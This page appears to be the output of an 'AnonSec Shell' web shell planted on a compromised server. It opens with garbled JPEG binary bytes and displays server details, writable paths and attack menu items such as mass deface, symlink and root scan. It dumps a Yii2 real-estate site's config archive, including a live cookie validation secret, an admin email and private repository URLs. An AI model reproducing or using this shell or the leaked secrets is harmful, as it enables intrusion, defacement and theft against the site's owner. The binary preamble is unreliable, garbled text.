JFIFHHCnxxdC"&!1A2Q"aqBb1 ?R{~,.Y|@sl_޸s[+6ϵG};?2Y`&9LP?3rj  "@V]:3T-G*P ( *(@AEY]qqqALn+Wtu?)lQUT*Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ηnu ڶh%(Lvũbb-?M֍݌٥IHln㏷L(69L^"6Pd&1H&8@TUTCJ%eʹFTj4i5=0g J&Wc+3kU@PS@HH33M *"Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePPd\A2glo=WL(6^;k"ucoH"b ,PDVlvL_/:̗rN\mdcw T-O$w+FZ5T *Y~l:99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~YИ3M3@E)GTg%AnpPMUҀhԳW c֦iZ ffR 7qMcyAZTc0bZU k+oG<]APQTA={PDti@c>>KÚ"qL.1Pk6QY7t.k7o<P &yַܼJZyWz{UrS@~P)Y:A"]Y&ScVO%17 6l4i4YR5ruk*ؼdZͨZZ cLakb3N6æ\1`XTloTuTAA 7Uq@2ŬzoʼnБRͪ&8}:e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt"(.=Y:V#'H:δ4#6yjѥBB ;WD-ElFf67*\AmADQ__'2$TX9nu'm@iPDTqS`%u%3[nY, :g = tiXH]ij"+6Z* .~|05s6 ,ǡogm+KtE-BF ES@(UJxM~8%g/=Vw[Vh3lJT rK -kˎYٰ,ukͱٵf sXDP]p]&MS95O+j&f6m463@t8ЕX=6}HR5ٶ06/@嚵*6  "hP@eVDiYQT`7tLf4c?m//B4 lajL} :Eb#PHQb,yN`rkAb^ |}s4XB4*,@[{Ru+%le2}`,kI$U`>OMuhP% ʵ/ L\5aɕVN1R63}ZLj-Dl@*(K\^i@F@551k㫖hQ沬#h XV +;]6zOsFpiX$OQ )ųl4YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 162.19.86.63  /  Your IP : 216.73.216.249   [ Reverse IP ]
Web Server : Apache
System : Linux oirealestate.net 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : oinversion ( 10001)
PHP Version : 5.6.40
Disable Function : opcache_get_status
Domains : 5 Domains
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/oinversion.com/.trash/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/vhosts/oinversion.com/.trash/config.tar
bootstrap.php000066600000000006151456230750007302 0ustar00<?php
main.php000066600000005474151456230750006227 0ustar00<?php
$params = array_merge(
    require(__DIR__ . '/../../common/config/params.php'),
    require(__DIR__ . '/../../common/config/params-local.php'),
    require(__DIR__ . '/params.php'),
    require(__DIR__ . '/params-local.php')
);
$urlManager = require(__DIR__ . '/urlManager.php');

return [
    'id' => 'app-frontend',
    'basePath' => dirname(__DIR__),
    'bootstrap' => ['log'],
    'controllerNamespace' => 'frontend\controllers',
    'modules' => [
        'resizer' => require(__DIR__ . '/../../common/config/resizer.php'),
    ],
    'components' => [
        'user' => [
            'identityClass' => 'common\models\User',
            'enableAutoLogin' => true,
        ],
        'log' => [
            'traceLevel' => YII_DEBUG ? 3 : 0,
            'targets' => [
                [
                    'class' => 'yii\log\FileTarget',
                    'levels' => ['error', 'warning'],
                ],
            ],
        ],
        'errorHandler' => [
            'errorAction' => 'site/error',
        ],
        'i18n' => [
            'translations' => [
            '*' => [
                    'class' => yii\i18n\DbMessageSource::className(),
                    'sourceLanguage' => 'en-US',
                    'forceTranslation' => true,
                    'sourceMessageTable' => '{{%source_message}}',
                    'messageTable' => '{{%translated_message}}',
                    'on missingTranslation' => ['common\components\TranslationEventHandler',
                                                'handleMissingTranslation'
                                                ],

                ],
                'app' => [
                    'class' => 'yii\i18n\PhpMessageSource',
                    'forceTranslation' => true
                ],
            ],
        ],
        'view' => [
            'theme' => [
                'class' => yii\base\Theme::className(),
                'basePath' => '@app/themes/oinversion'
            ]
        ],
        'assetManager' => [
            'linkAssets' => true,
            'appendTimestamp' => true,
            'converter' => [
                'class' => 'yii\web\AssetConverter',
                'commands' => [
                    'less' => ['css', 'lessc {from} > {to} --no-color'],
                ],
            ],
            'bundles' => [
                'frontend\assets\OinversionAssetBundle',
            ],
        ],
        /*  NOTE: About slash suffix
            https://github.com/yiisoft/yii2/issues/7670
            https://github.com/yiisoft/yii2/issues/1807
            http://stackoverflow.com/questions/28018061/yii2-url-mapping-suffix
        */
        'urlManager' => $urlManager,
        'mailer' => [
            'class' => 'yii\swiftmailer\Mailer',
            'viewPath' => '@frontend/mail',
        ],

    ],
    'params' => $params,
];
resizer.php000066600000001011151456230750006745 0ustar00<?php

return [
    'class' => 'common\modules\resizer\Module',
    'allowedPaths' => [
        // must end in /
        'uploads/',
        'assets/',
    ],
    'filters' => [
        'my_thumb' => 'common\modules\resizer\filters\MyThumbResizeFilter',
        'ProjectSmall' => 'common\modules\resizer\filters\ProjectSmallResizeFilter',
        'ProjectMedium' => 'common\modules\resizer\filters\ProjectMediumResizeFilter',
        'ProjectLarge' => 'common\modules\resizer\filters\ProjectLargeResizeFilter',
    ],
];
main-local.php000066600000000413151456230750007303 0ustar00<?php
return [
    'components' => [
        'request' => [
            // !!! insert a secret key in the following (if it is empty) - this is required by cookie validation
            'cookieValidationKey' => 'VJ93xvcz__f3Tv16uUk4JCFCF0g5xSUF',
        ],
    ],
];
params-local.php000066600000000022151456230750007636 0ustar00<?php
return [
];
.gitignore000066600000000037151456230750006550 0ustar00main-local.php
params-local.phpparams.php000066600000001216151456230750006554 0ustar00<?php
return [
    'adminEmail' => 'info@oinversion.com',
    'disqus_shortname' => 'oinversion',
    'supportedLanguages' => ['es-ES' => 'esp',
                             'en-US' => 'eng'],
    'completedLanguages' => [
      'es-ES',
      'en-US',
    ],
    'appMainLanguage' => 'es-ES',
    //set only if fallback Language will be different from appMainLanguage
    'fallbackLanguage' => 'es-ES',
    //redirect index, site/index and site, to /
    'allowRedirectionOfSiteIndexAction' => true,
    'flatPage'=>[
        'customActions'=> [
            'contacto' => 'site/contact',
            'proyectos' => 'site/projects',
        ],
    ],
];
message.php000066600000006717151456231330006723 0ustar00<?php

return [
    // string, required, root directory of all source files
    'sourcePath' => __DIR__ . DIRECTORY_SEPARATOR . '..',
    // array, required, list of language codes that the extracted messages
    // should be translated to. For example, ['zh-CN', 'de'].
    'languages' => ['en-US','es-ES'],
    // string, the name of the function for translating messages.
    // Defaults to 'Yii::t'. This is used as a mark to find the messages to be
    // translated. You may use a string for single function name or an array for
    // multiple function names.
    'translator' => 'Yii::t',
    // boolean, whether to sort messages by keys when merging new messages
    // with the existing ones. Defaults to false, which means the new (untranslated)
    // messages will be separated from the old (translated) ones.
    //'sort' => false,
    // boolean, whether to remove messages that no longer appear in the source code.
    // Defaults to false, which means each of these messages will be enclosed with a pair of '@@' marks.
    'removeUnused' => true,
    // array, list of patterns that specify which files (not directories) should be processed.
    // If empty or not set, all files will be processed.
    // Please refer to "except" for details about the patterns.
    'only' => ['*.php'],
    // array, list of patterns that specify which files/directories should NOT be processed.
    // If empty or not set, all files/directories will be processed.
    // A path matches a pattern if it contains the pattern string at its end. For example,
    // '/a/b' will match all files and directories ending with '/a/b';
    // the '*.svn' will match all files and directories whose name ends with '.svn'.
    // and the '.svn' will match all files and directories named exactly '.svn'.
    // Note, the '/' characters in a pattern matches both '/' and '\'.
    // See helpers/FileHelper::findFiles() description for more details on pattern matching rules.
    // If a file/directory matches both a pattern in "only" and "except", it will NOT be processed.
    'except' => [
        '.svn',
        '.git',
        '.gitignore',
        '.gitkeep',
        '.hgignore',
        '.hgkeep',
    ],

    // 'php' output format is for saving messages to php files.
    // 'format' => 'php',
    // Root directory containing message translations.
    // 'messagePath' => __DIR__,
    // boolean, whether the message file should be overwritten with the merged messages
    // 'overwrite' => true,

    // Message categories to ignore
    'ignoreCategories' => [
        'yii',
    ],
    'translations' => [
        '*' => [
            'class' => yii\i18n\DbMessageSource::className(),
            'forceTranslation' => true,
        ],
    ],
    // 'db' output format is for saving messages to database.
    'format' => 'db',
    // Connection component to use. Optional.
    //'db' => 'db',
    // Custom source message table. Optional.
    'sourceMessageTable' => '{{%source_message}}',
    // Custom name for translation message table. Optional.
    'messageTable' => '{{%translated_message}}',

    /*
    // 'po' output format is for saving messages to gettext po files.
    'format' => 'po',
    // Root directory containing message translations.
    'messagePath' => __DIR__ . DIRECTORY_SEPARATOR . 'messages',
    // Name of the file that will be used for translations.
    'catalog' => 'messages',
    // boolean, whether the message file should be overwritten with the merged messages
    'overwrite' => true,
    */
];
var/www/vhosts/oinversion.com/httpdocs/.git/config000064400000000416151456236320016347 0ustar00[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[remote "origin"]
	url = git@bitbucket.org:oirealestate/oinversion.git
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
	remote = origin
	merge = refs/heads/master
urlManager.php000066600000002665151677613660007411 0ustar00<?php
return [
    'class'             => common\components\MultiLingualUrlManager::className(),
    'enablePrettyUrl'   => true,
    'showScriptName'    => false, // false - means that index.php will not be part of the URLs
    'rules' => [
        ['pattern'=>'/<language:[a-z]{2}-[A-Z]{2}>','route'=>'site/index','suffix'=>'/'],
        ['pattern'=>'/<language:[a-z]{2}-[A-Z]{2}>/blog/tag/<tag>','route'=>'blog/index'],
        'blog/tag/<tag>' => 'blog/index',
        ['pattern'=>'/<language:[a-z]{2}-[A-Z]{2}>/blog','route'=>'blog/index','suffix'=>'/'],
        ['pattern'=>'/blog','route'=>'blog/index','suffix'=>'/'],
        '<language>/blog/<slug>' => 'blog/view',
        'blog/<slug>' => 'blog/view',
        '<language>/blog/category/<slug>' => 'blog/category-index',
        'blog/category/<slug>' => 'blog/category-index',
        '<language>/proyecto/<id:\d+>/<slug:[a-z -_.]+>' => 'site/file',
        'proyecto/<id:\d+>/<slug:[a-z -_.]+>' => 'site/file',
        ['class' => 'frontend\components\FlatPageUrlRule'],
        [
            'class' => 'common\modules\resizer\components\ResizerUrlRule',
        ],
        '<language>/<action>' => 'site/<action>',
        '/' => 'site/index',
        '<action>' => 'site/<action>',
        '<language>/<controller>/<action>/<id>' => '<controller>/<action>',
        '<language>/<controller>/<action>' => '<controller>/<action>',
        '<language>/<controller>/<id>' => '<controller>',
    ],
];assets-prod.php000066600000002370151677613660007551 0ustar00<?php
/**
 * This file is generated by the "yii asset" command.
 * DO NOT MODIFY THIS FILE DIRECTLY.
 * @version 2015-12-14 17:33:01
 */
return [
    'all' => [
        'class' => 'frontend\\assets\\AllAsset',
        'basePath' => '@webroot',
        'baseUrl' => '@web',
        'js' => [
            'compressed-assets/all-1bf96460d930621ec14c72db351fefc7.js',
        ],
        'css' => [
            'compressed-assets/all-aab2b51f1f35f58eea7c1572c0cffcf8.css',
        ],
    ],
    'yii\\web\\JqueryAsset' => [
        'sourcePath' => null,
        'js' => [],
        'css' => [],
        'depends' => [
            'all',
        ],
    ],
    'yii\\web\\YiiAsset' => [
        'sourcePath' => null,
        'js' => [],
        'css' => [],
        'depends' => [
            'yii\\web\\JqueryAsset',
            'all',
        ],
    ],
    'yii\\bootstrap\\BootstrapAsset' => [
        'sourcePath' => null,
        'js' => [],
        'css' => [],
        'depends' => [
            'all',
        ],
    ],
    'frontend\\assets\\AppAsset' => [
        'sourcePath' => null,
        'js' => [],
        'css' => [],
        'depends' => [
            'yii\\web\\YiiAsset',
            'yii\\bootstrap\\BootstrapAsset',
            'all',
        ],
    ],
];var/www/vhosts/oinversion.com/httpdocs/vendor/kartik-v/yii2-widget-fileinput/.git/config000064400000000723151700547250025526 0ustar00[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[remote "origin"]
	url = https://github.com/kartik-v/yii2-widget-fileinput.git
	fetch = +refs/heads/*:refs/remotes/origin/*
	pushurl = git@github.com:kartik-v/yii2-widget-fileinput.git
[branch "master"]
	remote = origin
	merge = refs/heads/master
[remote "composer"]
	url = https://github.com/kartik-v/yii2-widget-fileinput.git
	fetch = +refs/heads/*:refs/remotes/composer/*
console/unit.php000066600000000722151703425660007714 0ustar00<?php
/**
 * Application configuration for console unit tests
 */
return yii\helpers\ArrayHelper::merge(
    require(YII_APP_BASE_PATH . '/common/config/main.php'),
    require(YII_APP_BASE_PATH . '/common/config/main-local.php'),
    require(YII_APP_BASE_PATH . '/console/config/main.php'),
    require(YII_APP_BASE_PATH . '/console/config/main-local.php'),
    require(dirname(__DIR__) . '/config.php'),
    require(dirname(__DIR__) . '/unit.php'),
    [
    ]
);
backend/config.php000066600000000120151703425660010117 0ustar00<?php
/**
 * Application configuration for all backend test types
 */
return [];backend/functional.php000066600000001166151703425660011027 0ustar00<?php
$_SERVER['SCRIPT_FILENAME'] = YII_TEST_BACKEND_ENTRY_FILE;
$_SERVER['SCRIPT_NAME'] = YII_BACKEND_TEST_ENTRY_URL;

/**
 * Application configuration for backend functional tests
 */
return yii\helpers\ArrayHelper::merge(
    require(YII_APP_BASE_PATH . '/common/config/main.php'),
    require(YII_APP_BASE_PATH . '/common/config/main-local.php'),
    require(YII_APP_BASE_PATH . '/backend/config/main.php'),
    require(YII_APP_BASE_PATH . '/backend/config/main-local.php'),
    require(dirname(__DIR__) . '/config.php'),
    require(dirname(__DIR__) . '/functional.php'),
    require(__DIR__ . '/config.php'),
    [
    ]
);
backend/unit.php000066600000000771151703425660007645 0ustar00<?php

/**
 * Application configuration for backend unit tests
 */
return yii\helpers\ArrayHelper::merge(
    require(YII_APP_BASE_PATH . '/common/config/main.php'),
    require(YII_APP_BASE_PATH . '/common/config/main-local.php'),
    require(YII_APP_BASE_PATH . '/backend/config/main.php'),
    require(YII_APP_BASE_PATH . '/backend/config/main-local.php'),
    require(dirname(__DIR__) . '/config.php'),
    require(dirname(__DIR__) . '/unit.php'),
    require(__DIR__ . '/config.php'),
    [
    ]
);
backend/acceptance.php000066600000001157151703425660010753 0ustar00<?php
defined('YII_APP_BASE_PATH') or define('YII_APP_BASE_PATH', dirname(dirname(dirname(dirname(__DIR__)))));

/**
 * Application configuration for backend acceptance tests
 */
return yii\helpers\ArrayHelper::merge(
    require(YII_APP_BASE_PATH . '/common/config/main.php'),
    require(YII_APP_BASE_PATH . '/common/config/main-local.php'),
    require(YII_APP_BASE_PATH . '/backend/config/main.php'),
    require(YII_APP_BASE_PATH . '/backend/config/main-local.php'),
    require(dirname(__DIR__) . '/config.php'),
    require(dirname(__DIR__) . '/acceptance.php'),
    require(__DIR__ . '/config.php'),
    [
    ]
);
config.php000066600000001344151703425660006541 0ustar00<?php
/**
 * Application configuration shared by all applications and test types
 */
return [
    'language' => 'en-US',
    'controllerMap' => [
        'fixture' => [
            'class' => 'yii\faker\FixtureController',
            'fixtureDataPath' => '@tests/codeception/common/fixtures/data',
            'templatePath' => '@tests/codeception/common/templates/fixtures',
            'namespace' => 'tests\codeception\common\fixtures',
        ],
    ],
    'components' => [
        'db' => [
            'dsn' => 'mysql:host=localhost;dbname=yii2_advanced_tests',
        ],
        'mailer' => [
            'useFileTransport' => true,
        ],
        'urlManager' => [
            'showScriptName' => true,
        ],
    ],
];
functional.php000066600000000747151703425660007444 0ustar00<?php
/**
 * Application configuration shared by all applications functional tests
 */
return [
    'components' => [
        'request' => [
            // it's not recommended to run functional tests with CSRF validation enabled
            'enableCsrfValidation' => false,
            // but if you absolutely need it set cookie domain to localhost
            /*
            'csrfCookie' => [
                'domain' => 'localhost',
            ],
            */
        ],
    ],
];frontend/config.php000066600000000121151703425660010350 0ustar00<?php
/**
 * Application configuration for all frontend test types
 */
return [];frontend/functional.php000066600000001151151703425660011251 0ustar00<?php
$_SERVER['SCRIPT_FILENAME'] = FRONTEND_ENTRY_FILE;
$_SERVER['SCRIPT_NAME'] = FRONTEND_ENTRY_URL;

/**
 * Application configuration for frontend functional tests
 */
return yii\helpers\ArrayHelper::merge(
    require(YII_APP_BASE_PATH . '/common/config/main.php'),
    require(YII_APP_BASE_PATH . '/common/config/main-local.php'),
    require(YII_APP_BASE_PATH . '/frontend/config/main.php'),
    require(YII_APP_BASE_PATH . '/frontend/config/main-local.php'),
    require(dirname(__DIR__) . '/config.php'),
    require(dirname(__DIR__) . '/functional.php'),
    require(__DIR__ . '/config.php'),
    [
    ]
);
frontend/unit.php000066600000000774151703425660010100 0ustar00<?php

/**
 * Application configuration for frontend unit tests
 */
return yii\helpers\ArrayHelper::merge(
    require(YII_APP_BASE_PATH . '/common/config/main.php'),
    require(YII_APP_BASE_PATH . '/common/config/main-local.php'),
    require(YII_APP_BASE_PATH . '/frontend/config/main.php'),
    require(YII_APP_BASE_PATH . '/frontend/config/main-local.php'),
    require(dirname(__DIR__) . '/config.php'),
    require(dirname(__DIR__) . '/unit.php'),
    require(__DIR__ . '/config.php'),
    [
    ]
);
frontend/acceptance.php000066600000001162151703425660011177 0ustar00<?php
defined('YII_APP_BASE_PATH') or define('YII_APP_BASE_PATH', dirname(dirname(dirname(dirname(__DIR__)))));

/**
 * Application configuration for frontend acceptance tests
 */
return yii\helpers\ArrayHelper::merge(
    require(YII_APP_BASE_PATH . '/common/config/main.php'),
    require(YII_APP_BASE_PATH . '/common/config/main-local.php'),
    require(YII_APP_BASE_PATH . '/frontend/config/main.php'),
    require(YII_APP_BASE_PATH . '/frontend/config/main-local.php'),
    require(dirname(__DIR__) . '/config.php'),
    require(dirname(__DIR__) . '/acceptance.php'),
    require(__DIR__ . '/config.php'),
    [
    ]
);
common/unit.php000066600000000620151703425660007537 0ustar00<?php
/**
 * Application config for common unit tests
 */
return yii\helpers\ArrayHelper::merge(
    require(YII_APP_BASE_PATH . '/common/config/main.php'),
    require(YII_APP_BASE_PATH . '/common/config/main-local.php'),
    require(dirname(__DIR__) . '/config.php'),
    require(dirname(__DIR__) . '/unit.php'),
    [
        'id' => 'app-common',
        'basePath' => dirname(__DIR__),
    ]
);
unit.php000066600000000135151703425660006250 0ustar00<?php
/**
 * Application configuration shared by all applications unit tests
 */
return [

];acceptance.php000066600000000143151703425660007356 0ustar00<?php
/**
 * Application configuration shared by all applications acceptance tests
 */
return [

];var/www/vhosts/oinversion.com/httpdocs/vendor/germanigortcev/yii2-summernote-widget/.git/config000064400000000750151703716030027206 0ustar00[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[remote "origin"]
	url = https://github.com/germanigortcev/yii2-summernote-widget.git
	fetch = +refs/heads/*:refs/remotes/origin/*
	pushurl = git@github.com:germanigortcev/yii2-summernote-widget.git
[branch "master"]
	remote = origin
	merge = refs/heads/master
[remote "composer"]
	url = https://github.com/germanigortcev/yii2-summernote-widget.git
	fetch = +refs/heads/*:refs/remotes/composer/*

Anon7 - 2022
AnonSec Team